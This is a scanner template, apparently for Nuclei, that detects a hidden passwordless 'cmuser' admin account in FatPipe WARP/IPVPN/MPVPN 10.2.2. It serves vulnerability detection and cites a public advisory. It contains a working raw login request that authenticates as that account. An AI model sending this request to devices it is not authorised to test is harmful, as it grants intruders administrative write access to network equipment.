38 lines
1.1 KiB
YAML
38 lines
1.1 KiB
YAML
id: fatpipe-backdoor
|
|
|
|
info:
|
|
name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account
|
|
author: gy741
|
|
severity: high
|
|
description: The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
|
|
reference:
|
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
|
|
- https://www.fatpipeinc.com/support/advisories.php
|
|
tags: fatpipe,default-login,backdoor,auth-bypass
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /fpui/loginServlet HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "application/json"
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- '"loginRes":"success"'
|
|
- '"activeUserName":"cmuser"'
|
|
condition: and
|